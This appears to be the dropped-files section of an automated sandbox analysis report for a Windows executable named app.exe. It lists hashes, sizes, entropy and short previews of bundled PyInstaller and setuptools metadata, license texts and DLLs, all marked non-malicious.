                                                                                                                                                                                                          SSDEEP:3072:X/QzNxXNH/aml0Ocp9V69g7eoipCRF0W4XOoKmpgMBUI3CnOnL5MlTe1NE1IGVhb:XIzrNH/a4+L69g7eoKoYXOPmpgMBewMZ
                                                                                                                                                                                                          MD5:E684792507FAF113474A6D1217AEEAAD
                                                                                                                                                                                                          SHA1:F9486048EC025A9F469F52C1788A74E70975B431
                                                                                                                                                                                                          SHA-256:1035C85C840C1007D5F5BB62CA7358D6C85B5E4BF15155FE0857C6A17453F18A
                                                                                                                                                                                                          SHA-512:1A50BC231963D405F25879EE3560EB90F7B18D51640B9B4D848F18CAA9FEF14907F8935A86F093478BE0EE0E1261E4BCC8C697B486BC0617C5F77370337D48C3
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):30634
                                                                                                                                                                                                          Entropy (8bit):4.687948422038189
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:8+ztint/HdxEUwi5rDL676yV12rPd34ZomzM2FR+qWi9vlKM1zJlFvmNz5VrlkTv:rzolHv7FgixMFzMqd9TzJlFvAfxk1rt
                                                                                                                                                                                                          MD5:371FE7FDEE041250F12B3A4658A14278
                                                                                                                                                                                                          SHA1:A4AAA06709FF77945CA1A42ECCC06C9C99182A27
                                                                                                                                                                                                          SHA-256:DD7315735D0C3CBB0CC861A3EA4D9CEE497568B98CACEA64AF3EA51F4E4B5386
                                                                                                                                                                                                          SHA-512:77FBA931238B59A44357996EC3A39D5E8CDD8E8CBED963927A814B30AADA1F0FF88FB2D62D2DCD9955DBA9458C4A310252B72E52963FEBD0E80639ABA53A9D19
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:================================. The PyInstaller licensing terms.================================. ..Copyright (c) 2010-2022, PyInstaller Development Team.Copyright (c) 2005-2009, Giovanni Bajo.Based on previous work under copyright (c) 2002 McMillan Enterprises, Inc....PyInstaller is licensed under the terms of the GNU General Public License.as published by the Free Software Foundation; either version 2 of the License,.or (at your option) any later version....Bootloader Exception.--------------------..In addition to the permissions in the GNU General Public License, the.authors give you unlimited permission to link or embed compiled bootloader.and related files into combinations with other programs, and to distribute.those combinations without any restriction coming from the use of those.files. (The General Public License restrictions do apply in other respects;.for example, they cover modification of the files, and distribution when.not linked into a combined executable.). . .Bootlo
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):7666
                                                                                                                                                                                                          Entropy (8bit):4.988715114517115
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:W5c5PvuPNfCD2bOMiwMgbHGB+GXlKp9ooUgVzpWwU:KqD2bdiDgbHGB5XlMoCzAwU
                                                                                                                                                                                                          MD5:C098BE7E8F7073EC5E1FB547FB53ADA7
                                                                                                                                                                                                          SHA1:4D003B4F4A4A8BB259BDC7B2E6FE1AA84D267580
                                                                                                                                                                                                          SHA-256:B0F4E8750D00899A1480B50F1F86A02B5507E5DE739122B5E5B046942926B2E3
                                                                                                                                                                                                          SHA-512:31DED9733194B884424169E88D867B61803A007FA25AF46344F94EF663607C725410077DE5120CC1A825BAD2A74DE10CCE0AFD2B04AE5E8C74C54D6881965390
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: pyinstaller.Version: 5.3.Summary: PyInstaller bundles a Python application and all its dependencies into a single package..Home-page: https://www.pyinstaller.org/.Author: Hartmut Goebel, Giovanni Bajo, David Vierra, David Cortesi, Martin Zibricky.License: GPLv2-or-later with a special exception which allows to use PyInstaller to build and distribute non-free programs (including commercial ones).Project-URL: Source, https://github.com/pyinstaller/pyinstaller.Keywords: packaging, app, apps, bundle, convert, standalone, executable,pyinstaller, cxfreeze, freeze, py2exe, py2app, bbfreeze.Platform: UNKNOWN.Classifier: Development Status :: 6 - Mature.Classifier: Environment :: Console.Classifier: Intended Audience :: Developers.Classifier: Intended Audience :: Other Audience.Classifier: Intended Audience :: System Administrators.Classifier: License :: OSI Approved :: GNU General Public License v2 (GPLv2).Classifier: Natural Language :: English.Classifier: Operatin
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):61383
                                                                                                                                                                                                          Entropy (8bit):5.583956862829814
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:1536:2N9mTbpsSWQJQq4WPY1y0yvtZY6W3+j73wt5a14bXPA+Yla1U9jZqfw1Y+Z:FIWZ4w
                                                                                                                                                                                                          MD5:CC0780D0D8494B5833C0AA13D86631F2
                                                                                                                                                                                                          SHA1:A8DB321D4F9267E958E1FD85FD0CBAB51B450052
                                                                                                                                                                                                          SHA-256:41B6FBE3FB2218C9F3D8A11638C3421F26729EC400ABCB4D6D684ACF567C128E
                                                                                                                                                                                                          SHA-512:255AD98C86DC358482947DAE26AD593ABCD381928463F38154AFE30A7CADBFFBAD779ADE5817AF36315203C0EF22B0CC3CCB5FC992495B5CFF47F116551884B0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:../../Scripts/pyi-archive_viewer.exe,sha256=vMppFmmLTd7vkqicS3-t1GNcHV6kzp0UoFuYMbU8IGQ,107885..../../Scripts/pyi-bindepend.exe,sha256=DYMYlorHXiDThbvktJwK6m5ytH03IoTtbkJOZ7J27MQ,107880..../../Scripts/pyi-grab_version.exe,sha256=XV9nctriHP9RyH_dG-rMBmQCx6Fadi8SGa1NYbi8ef8,107883..../../Scripts/pyi-makespec.exe,sha256=TxJPQTuR6Vk_ezavD1TC-dIcxEOqvrMmmZKdlqGkJvc,107879..../../Scripts/pyi-set_version.exe,sha256=m8nysxuUo4428isubD67iDVl-HIPVY-XvGPCyIZffTE,107882..../../Scripts/pyinstaller.exe,sha256=drfPqBqiHDHAYC6QA0ucsur7L3kzE5ssh8xyfBY8utg,107864..PyInstaller/__init__.py,sha256=RjtylA9ScPU6z3cODj5E8OrtgNTWEqTNdJ4jrwp-ukc,2995..PyInstaller/__main__.py,sha256=aGOoTVNJirDPkbPWSIikxslmYubyVhrv65xjYkC9Dw8,6690..PyInstaller/__pycache__/__init__.cpython-38.pyc,,..PyInstaller/__pycache__/__main__.cpython-38.pyc,,..PyInstaller/__pycache__/_recursion_too_deep_message.cpython-38.pyc,,..PyInstaller/__pycache__/_shared_with_waf.cpython-38.pyc,,..PyInstaller/__pycache__/compat.cpython-38.pyc,,..PyIns
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):98
                                                                                                                                                                                                          Entropy (8bit):4.942294805297369
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:RtEeX7MWcSlViZHKRRP+tPCCfA5TLn:RtBMwlViojWBBULn
                                                                                                                                                                                                          MD5:BD79A71753483602E3586C3A0DFB00F4
                                                                                                                                                                                                          SHA1:52402F54E3FB4E09D81E3728ABBB2B88E61F96F0
                                                                                                                                                                                                          SHA-256:8BDA908FC29A0FCFD8116D15736A12E7A7CA8EEDB746443E155CFE426CD56A44
                                                                                                                                                                                                          SHA-512:F07F7F327EA32CFD47D0226B40CECC229EB679E6B186629F37E6AE5EB7B8D414112DAB6179F8F82A54A8F7936158100CECFECCF1FD0F4FB3CF67A637DDC06AF0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.37.1).Root-Is-Purelib: true.Tag: py3-none-win_amd64..
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):361
                                                                                                                                                                                                          Entropy (8bit):4.532364994515823
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:6:1VkKXL0DjyXLfUynXLEB85AQFXLHHVtAcRNnXLAX2OXFnXLLMMn:1qKXIyXLpXg4hX7VtdFXsX2OXFnXMM
                                                                                                                                                                                                          MD5:E1773209C0AB0B0402725B5776B57AFF
                                                                                                                                                                                                          SHA1:AC23E47ED2047EED17058116BE2E02D93B6EEF25
                                                                                                                                                                                                          SHA-256:1EF5246366023F170942310D9E04650C4B666257FFA967A01B5FF0BFF27DF463
                                                                                                                                                                                                          SHA-512:95DFC681D676A6D8F49CD8A65EA40B4A8C21BB62DB9075ABE3EB8B20EB5EC4D72C1E4C86DA0A94C5010156FB93BEC96DBD50E127091B7B559A91B6EB29BBB534
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[console_scripts].pyi-archive_viewer = PyInstaller.utils.cliutils.archive_viewer:run.pyi-bindepend = PyInstaller.utils.cliutils.bindepend:run.pyi-grab_version = PyInstaller.utils.cliutils.grab_version:run.pyi-makespec = PyInstaller.utils.cliutils.makespec:run.pyi-set_version = PyInstaller.utils.cliutils.set_version:run.pyinstaller = PyInstaller.__main__:run..
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):12
                                                                                                                                                                                                          Entropy (8bit):3.418295834054489
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:rLWTXvn:f8Xvn
                                                                                                                                                                                                          MD5:0A28E8E758F80C4B73AFD9DBEF9F96DD
                                                                                                                                                                                                          SHA1:10072E4EC58C0E15D5A62FD256AC9D7BC6A28BCB
                                                                                                                                                                                                          SHA-256:1AE466BD65C64D124D6262B989618E82536FE0BDDBCBB60A68488AC9C359E174
                                                                                                                                                                                                          SHA-512:38D7A1B6198701708F90750C9D82390A150972FB898FC91C825FF6F6FE2A560B3BCC381A388BB7FE5DFAE63550BEC2A6A7CFED1390E620A5B2A559726C1439E5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:PyInstaller.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):58952
                                                                                                                                                                                                          Entropy (8bit):5.849953914987793
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:oS99q+0o22ByfbEap+VCBQ53gUiT5pLFdBk4/yFi1nuVwWBjChtFyrUdmd9RSxDD:79xiEAnUvdK1IGV0QyrI
                                                                                                                                                                                                          MD5:7ACEC875D5672E7AA148B8C40DF9AA49
                                                                                                                                                                                                          SHA1:96B8CFABE0CFA3DF32995919AC77CFDEEC26F1F2
                                                                                                                                                                                                          SHA-256:D96858E433F45917499DBF5E052E56F079FF9AE259FD3CAA025C3B1DAF852891
                                                                                                                                                                                                          SHA-512:1208DA62FE82B779EC822AD702F9CA4321B34EE590C28E10EFE9A2DB6D582BFDCAE01AB2431C1A98714EF0C60434D64C58F3DB31BF5886EFBB943ADC70D6E975
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4183112
                                                                                                                                                                                                          Entropy (8bit):6.420172758698049
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:49152:wV6CJES/Za2BaobNruDPYRQYK8JCNNtkAz+/Q46VqNo9NYxwCFIInKHJCMjntPNj:MxB/aDUQNtufeNFIKHoMjzkDU
                                                                                                                                                                                                          MD5:D2A8A5E7380D5F4716016777818A32C5
                                                                                                                                                                                                          SHA1:FB12F31D1D0758FE3E056875461186056121ED0C
                                                                                                                                                                                                          SHA-256:59AB345C565304F638EFFA7C0236F26041FD06E35041A75988E13995CD28ACE9
                                                                                                                                                                                                          SHA-512:AD1269D1367F587809E3FBE44AF703C464A88FA3B2AE0BF2AD6544B8ED938E4265AAB7E308D999E6C8297C0C85C608E3160796325286DB3188A3EDF040A02AB7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):150016
                                                                                                                                                                                                          Entropy (8bit):6.014127736250603
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3072:uNQ5J8g8dKuii+9BcYrrC0vEM6zcMKo8Nz7onQp:uN4QKuCqYrrC05YcMKDNz7on
                                                                                                                                                                                                          MD5:4BFA43585AD0F9B7AC5858CF2C0B4963
                                                                                                                                                                                                          SHA1:F3E34E2D5748BDC1F49CC665342EE66662919873
                                                                                                                                                                                                          SHA-256:455682C2212474AE895BFB931FFD7D1D15993451BDBE65ACE820C9E747CA3490
                                                                                                                                                                                                          SHA-512:D2346B871F06ADFCB115A97E2B04BE3D49F16BF2E92EAB303E9EABD562E50F95307C8EA7A2F0541579224648FB3938A58D1C31E2248A5C6FCBC5D359D6864CC8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26696
                                                                                                                                                                                                          Entropy (8bit):6.101296746249305
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:6kYtqIDCNdwhBfAqXuqzz5H1IGqGbWDG4y4:6TnDCNCh93X7zzR1IGqG2y4
                                                                                                                                                                                                          MD5:6AE54D103866AAD6F58E119D27552131
                                                                                                                                                                                                          SHA1:BC53A92A7667FD922CE29E98DFCF5F08F798A3D2
                                                                                                                                                                                                          SHA-256:63B81AF5D3576473C17AC929BEA0ADD5BF8D7EA95C946CAF66CBB9AD3F233A88
                                                                                                                                                                                                          SHA-512:FF23F3196A10892EA22B28AE929330C8B08AB64909937609B7AF7BFB1623CD2F02A041FD9FAB24E4BC1754276BDAFD02D832C2F642C8ECDCB233F639BDF66DD0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4
                                                                                                                                                                                                          Entropy (8bit):1.5
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:Mn:M
                                                                                                                                                                                                          MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                          SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                          SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                          SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:pip.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1023
                                                                                                                                                                                                          Entropy (8bit):5.059832621894572
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                          MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                          SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                          SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                          SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):6176
                                                                                                                                                                                                          Entropy (8bit):5.064083268095371
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:FPrK1IGRbneReDO28X992nN5Ps2+GzHFwTE:4pRbneReDO2u92nNhs2PDFF
                                                                                                                                                                                                          MD5:73680194760A890ADE27A46FD4D39082
                                                                                                                                                                                                          SHA1:789D67BB2F46EE10B18612F4E5664B19733FD762
                                                                                                                                                                                                          SHA-256:DD1E1121E3FE31F74445B21F8C56CA37C259C8A2E215FAE8910870F2F102CC66
                                                                                                                                                                                                          SHA-512:02A86F3F9382976847FEE439E14F2881A306D997F5966B093098F36D9CD581D2E2ED615FB867270579BF4A79F5B5524284984E491AD54755A571EF21D5CF76B7
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Metadata-Version: 2.1.Name: setuptools.Version: 69.5.1.Summary: Easily download, build, install, upgrade, and uninstall Python packages.Home-page: https://github.com/pypa/setuptools.Author: Python Packaging Authority.Author-email: distutils-sig@python.org.Project-URL: Documentation, https://setuptools.pypa.io/.Project-URL: Changelog, https://setuptools.pypa.io/en/stable/history.html.Keywords: CPAN PyPI distutils eggs package management.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: System :: Archiving :: Packaging.Classifier: Topic :: System :: Systems Administration.Classifier: Topic :: Utilities.Requires-Python: >=3.8.License-File: LICENSE.Provides-Extra: certs.Provides-Extra: docs.Requi
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:CSV text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):40485
                                                                                                                                                                                                          Entropy (8bit):5.578276068695422
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:uaz6ARRM1lhglU1rARJfP9kp6WhESY4cY/ySgrxkEX2B47fN3i59TeO+0gGglC9z:u3szs6BdmpO1h4POzWjfpiAU9q
                                                                                                                                                                                                          MD5:AD043300E38D9FA1124C9FB0B0A2ABCC
                                                                                                                                                                                                          SHA1:54E6F2F91ABC72FFF473E2662D88EFBBA9AC2CAD
                                                                                                                                                                                                          SHA-256:382A70865130DFDD8693ED0DE0E91102718EFC95BA3C3A3DE071AEF37479404E
                                                                                                                                                                                                          SHA-512:15CA5D0FFDA2DC3C08BFB24AC89B8F92368DDA6C692983679CA986DEAE2F7BCAC2D664EEA48032CF7445C67F8EEB17B81DC2BD5A3006528D9172BFE2D1E65A3C
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_distutils_hack/__init__.py,sha256=S_WwvI-K985wlulvcWfPT3dvLMCYP1yPh2yngLOmd4E,6002.._distutils_hack/__pycache__/__init__.cpython-38.pyc,,.._distutils_hack/__pycache__/override.cpython-38.pyc,,.._distutils_hack/override.py,sha256=Eu_s-NF6VIZ4Cqd0tbbA5wtWky2IZPNd8et6GLt1mzo,44..distutils-precedence.pth,sha256=JjjOniUA5XKl4N5_rtZmHrVp0baW_LoHsN0iPaX10iQ,151..pkg_resources/__init__.py,sha256=7WnM_gj0UbuMN0knvkudaPeI-IhWbjshIx8JewOiDeM,108932..pkg_resources/__pycache__/__init__.cpython-38.pyc,,..pkg_resources/_vendor/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/__pycache__/__init__.cpython-38.pyc,,..pkg_resources/_vendor/__pycache__/typing_extensions.cpython-38.pyc,,..pkg_resources/_vendor/__pycache__/zipp.cpython-38.pyc,,..pkg_resources/_vendor/backports/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..pkg_resources/_vendor/backports/__pycache__/__init__.cpython-38.pyc,,..pkg_resources/_vendor/backports/__pycache__/tarfile.cpytho
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):92
                                                                                                                                                                                                          Entropy (8bit):4.812622295095324
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2676
                                                                                                                                                                                                          Entropy (8bit):4.541824537388105
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[distutils.commands].alias = setuptools.command.alias:alias.bdist_egg = setuptools.command.bdist_egg:bdist_egg.bdist_rpm = setuptools.command.bdist_rpm:bdist_rpm.build = setuptools.command.build:build.build_clib = setuptools.command.build_clib:build_clib.build_ext = setuptools.command.build_ext:build_ext.build_py = setuptools.command.build_py:build_py.develop = setuptools.command.develop:develop.dist_info = setuptools.command.dist_info:dist_info.easy_install = setuptools.command.easy_install:easy_install.editable_wheel = setuptools.command.editable_wheel:editable_wheel.egg_info = setuptools.command.egg_info:egg_info.install = setuptools.command.install:install.install_egg_info = setuptools.command.install_egg_info:install_egg_info.install_lib = setuptools.command.install_lib:install_lib.install_scripts = setuptools.command.install_scripts:install_scripts.rotate = setuptools.command.rotate:rotate.saveopts = setuptools.command.saveopts:saveopts.sdist = setuptools.command.sdist:sdist.seto
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                          Entropy (8bit):3.9115956018096876
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:_distutils_hack.pkg_resources.setuptools.
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):39936
                                                                                                                                                                                                          Entropy (8bit):5.795641052692915
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1016584
                                                                                                                                                                                                          Entropy (8bit):6.669319438805479
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1096264
                                                                                                                                                                                                          Entropy (8bit):5.343512979675051
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):140800
                                                                                                                                                                                                          Entropy (8bit):5.889442361235446
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):78848
                                                                                                                                                                                                          Entropy (8bit):5.699166049502318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):35840
                                                                                                                                                                                                          Entropy (8bit):5.660208614410584
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:bgeiZ25H7FafTccMBk7nIi5khtwRQ5rIvOua:bgei+7FaLx7nvRQBCOua
                                                                                                                                                                                                          MD5:C58B53DC2DF84A63E58F9423F02D61ED
                                                                                                                                                                                                          SHA1:6EFA7E8D5AEB88A7384724D4CB642DF23CB6D813
                                                                                                                                                                                                          SHA-256:378B9465AC02811EE5BAF1C75B7B24F4BB21F601F9980B5E33EE334476AAB162
                                                                                                                                                                                                          SHA-512:B3DD2173DDD540090FB1B8858481128A0F9B719FC7D9CCEE0C2D96448B61FBB3E13C6D00A28D400FE4BAA9D83A49301646B9EDD45C747BB68B42824005CBC886
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):38400
                                                                                                                                                                                                          Entropy (8bit):5.50397576701013
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:QKQIjQZtexa6Wcu+CgJLcpf3sdtOGY2LW/s2V:QKljQZtey4lcpfcw2LW/s2
                                                                                                                                                                                                          MD5:F43F9B71DB5B32F8E4EDDDDF4C215765
                                                                                                                                                                                                          SHA1:651FE7478CABAD139B8CA84BE0371AB7DE63D299
                                                                                                                                                                                                          SHA-256:66A29A828C6AC7EC4B6A6A78C45766E9EF7F7A2416968EE9D01E38CF8C409B46
                                                                                                                                                                                                          SHA-512:FD39826897413B0BB6E78D94A76A2D14D4FE22EBA99C10C845B6D7A0828D1861E0C9F49234E4A050BD6ED611612C2D78C85D332A9856E7B37445B9A9A10888D8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\app.exe
                                                                                                                                                                                                          File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):786432
                                                                                                                                                                                                          Entropy (8bit):6.447839862132219
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:12288:y0ihMtx4AohG0KTSNOuQzb7fVqBwTPjRqbL+o6tbUqu7QFSms:9ih24AohGnTSNOu4qBwT0+o6tbUqu7Q4
                                                                                                                                                                                                          MD5:1FF0EAFA81248177E93FA5909BD0AB0D
                                                                                                                                                                                                          SHA1:2C73EE69611ABD7F829123AC2EF378BE18D470D2
